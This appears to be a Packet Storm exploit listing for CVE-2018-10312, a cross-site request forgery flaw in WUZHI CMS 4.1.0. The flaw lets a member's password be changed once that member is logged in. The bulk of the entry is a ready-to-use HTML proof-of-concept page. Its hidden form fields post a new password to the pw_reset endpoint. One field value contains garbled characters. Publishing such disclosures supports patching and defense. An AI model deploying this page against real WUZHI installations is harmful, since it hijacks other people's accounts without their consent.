Lucene search

K
packetstormJiguangPACKETSTORM:147332
HistoryApr 24, 2018 - 12:00 a.m.

Wuzhi CMS 4.1.0 Cross Site Request Forgery

2018-04-2400:00:00
jiguang
packetstormsecurity.com
26

EPSS

0.002

Percentile

56.8%

`# Exploit Title: WUZHI CMS 4.1.0 - Cross-Site Request Forgery  
# Date: 2018-04-23  
# Exploit Author: jiguang ([email protected])  
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms  
# Software Link: https://github.com/wuzhicms/wuzhicms  
# Version: 4.1.0  
# CVE: CVE-2018-10312  
  
An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/132)  
There is a csrf vulnerability that can modifying the member's password. via index.php?m=member&v=pw_reset  
After the member logged in. open the exp page  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://localhost/www/index.php?m=member&v=pw_reset" method="POST">  
<input type="hidden" name="password" value="yuduo" />  
<input type="hidden" name="password2" value="yuduo" />  
<input type="hidden" name="submit" value="ASSยกยฎ AY=ยฎยš" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
`

EPSS

0.002

Percentile

56.8%